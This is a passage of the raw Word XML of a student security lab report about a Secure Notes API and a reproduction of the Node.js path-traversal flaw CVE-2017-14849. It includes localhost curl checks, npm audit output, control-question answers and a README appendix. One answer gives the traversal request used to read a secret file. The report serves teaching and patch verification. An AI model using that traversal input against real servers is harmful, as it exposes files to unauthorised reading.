        <w:t>$ curl --path-as-is -s -o /dev/null -w '%{http_code}\n' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">       http://127.0.0.1:3000/static/main.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>$ curl --path-as-is -s -o /dev/null -w '%{http_code}\n' http://127.0.0.1:3000/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="220"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terminal transcript: attack blocked, service intact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5544000" cy="3908066"/>
            <wp:docPr id="4" name="Picture 4"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="shot-3-fixed.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5544000" cy="3908066"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Fig. 4  Proof of elimination: the identical request against the fixed runtime returns HTTP 404, while GET /static/main.js and GET / still return HTTP 200 (regression).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A useful cross-check comes from SCA. Running the same dependency audit against the pinned vulnerable tree reports eight advisories, two of them critical — the signature of an end-of-life runtime — while the API project reports zero. The upgrade therefore fixes this CVE and removes the wider exposure at the same time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>$ cd cve/CVE-2017-14849 &amp;&amp; npm audit --registry=https://registry.npmjs.org</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>8 vulnerabilities (2 low, 4 high, 2 critical)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>$ cd .. &amp;&amp; cd .. &amp;&amp; npm audit --registry=https://registry.npmjs.org</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>found 0 vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="220"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terminal transcript: SCA comparison between the vulnerable tree and the API project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>6. Control Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1. Why is bcrypt preferable to SHA-256 for password storage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SHA-256 is designed to be fast, so an attacker with a stolen database can test billions of candidates per second on commodity GPUs. bcrypt is deliberately slow, tunable through its cost factor, and salts every hash automatically, so the same password produces different digests and precomputed rainbow tables are useless. A plain hash also has no work factor at all, so it cannot be strengthened as hardware gets faster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. What is the main difference between SAST and DAST?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SAST analyses source code without running it, so it sees every branch including code that never executes, but it cannot tell whether a finding is reachable from an entry point and therefore produces false positives. DAST attacks a running application from the outside and reports only vulnerabilities that are actually exploitable, but it can only see what it manages to reach and gives no line number. This work uses SAST in the pipeline; the CVE part is a manual dynamic test — a real request is sent to a running server, but the request is written by hand rather than generated by a scanner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. Describe how a JWT works, what it contains, and how the server verifies it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A JWT is three base64url parts: a header naming the algorithm, a payload of claims, and a signature over the first two. Our payload carries sub, username, role, iat, exp and iss. The payload is only encoded, not encrypted, so nothing secret may be placed in it. The server verifies by recomputing the HMAC with its secret key, restricting the accepted algorithms to HS256, checking exp and iss, and then reloading the account so that a deleted user's token stops working.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. What risks arise if third-party libraries are not audited?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Most of the code in a modern service is somebody else's. An unaudited dependency can carry a publicly known vulnerability into production — exactly what happened in the CVE part of this work, where an outdated express tree reported eight advisories including two critical — or it can be taken over through a compromised maintainer account and start exfiltrating data on install. SCA gives early warning; lockfiles and a pinned, reviewed dependency set limit the blast radius.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5. What advantages do Docker and Vulhub give over installing vulnerable software directly?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Precision: Vulhub pins the exact vulnerable version, so the result is reproducible. Isolation: the vulnerable service cannot damage the host or the network, and stopping it is one command. Hygiene: no old runtime is left installed with its own CVEs. Reset: the environment is rebuilt in seconds after being broken. There is a fifth advantage that matters for this particular work: because both images mount the same application and the same target file, the runtime version is the only variable. With a native install the runtime version is a machine-global property — changing it means changing the machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>6. Distinguish a vulnerability from an exploit. What was reproduced in this work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A vulnerability is the flaw itself: here, the incorrect path normalisation in Node.js 8.5.0. An exploit is a concrete input that abuses it: here, the HTTP request GET /static/../foo/../../secret.txt. This work reproduced the exploit in order to demonstrate the vulnerability, but the object of study and the object of repair is the flaw, which is why patching the runtime — not the request — was the fix.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>7. Why is regression testing essential after applying a patch?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A fix that breaks the service is indistinguishable from a denial of service. Blocking traversal is trivial if the static server is simply turned off, so proving that /static/main.js and / still return 200 is part of the evidence, not an optional extra. Regression tests are also how a later refactoring is prevented from reintroducing the same behaviour.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>8. How does the ability to reproduce CVE vulnerabilities help a security specialist?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>It converts a text description into an observable behaviour, which is what is needed to decide whether a given system is really affected, to write a detection rule that fires, to confirm that a patch works, and to explain the risk to people who do not read advisories. In a SOC the same skill is the difference between closing a ticket as 'theoretically vulnerable' and demonstrating exploitation in the logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Both halves of the work are complete and verified. The API implements the three required endpoints, protects the injectable surfaces with prepared statements and output encoding, and implements authentication with bcrypt hashes and JWTs whose verification path defends against the classic algorithm attacks. Fourteen automated checks cover the properties claimed, and the pipeline enforces SAST and SCA on every push, currently reporting zero ESLint errors and zero npm audit findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The CVE part was more instructive than the API part. Reproducing CVE-2017-14849 showed that a vulnerability can live below the code a developer writes: the application was correct, the framework followed its own documentation, and the break was in the meaning of a standard library function. Once that was understood, the fix became obvious and minimal — one base image tag — while the naive alternative, filtering traversal strings in the application, would have traded one invisible bug for a visible one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Two limitations are worth recording. The first reproduction of this vulnerability was made natively, because Docker was not installed on the machine at that time; it was repeated in Docker afterwards, and both runs give the same result — section 5.3 reports the container run, which is what the manual asks for. The second is that the repository history was created with git only after the working tree was complete, so the commits do not show the development process itself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Appendix A. README.md (verbatim)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The submission checklist requires the report to contain the text of README.md from the repository. It is reproduced below exactly as committed, without reformatting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t># Secure Notes API — Information Security Lab, Work 1</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A small REST API built to demonstrate the OWASP Top 10 defences required by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>Work 1, together with a CI/CD pipeline that runs static analysis (SAST) and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>dependency analysis (SCA) on every push, and a reproduction of a real CVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>(**CVE-2017-14849**) with root-cause analysis, fix and verification.</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Work: **1 — Secure REST API Development with CI/CD and Real CVE Vulnerability Analysis**</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>* Variant: **0**</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>* Author: Wang Ruilin, 22320110, HDU-ITMO Joint Institute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Contents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1. [Stack](#1-stack)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>2. [Quick start](#2-quick-start)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>3. [API reference](#3-api-reference)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>4. [Security measures](#4-security-measures)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>5. [CI/CD pipeline and scan results](#5-cicd-pipeline-and-scan-results)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>6. [CVE analysis](#6-cve-analysis-cve-2017-14849)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>7. [Repository layout](#7-repository-layout)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1. Stack</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Language | JavaScript (Node.js) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Framework | Express 4.21 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Database | SQLite through the **built-in** `node:sqlite` module |</w:t>
      </w:r>
    </w:p>
    <w:p>
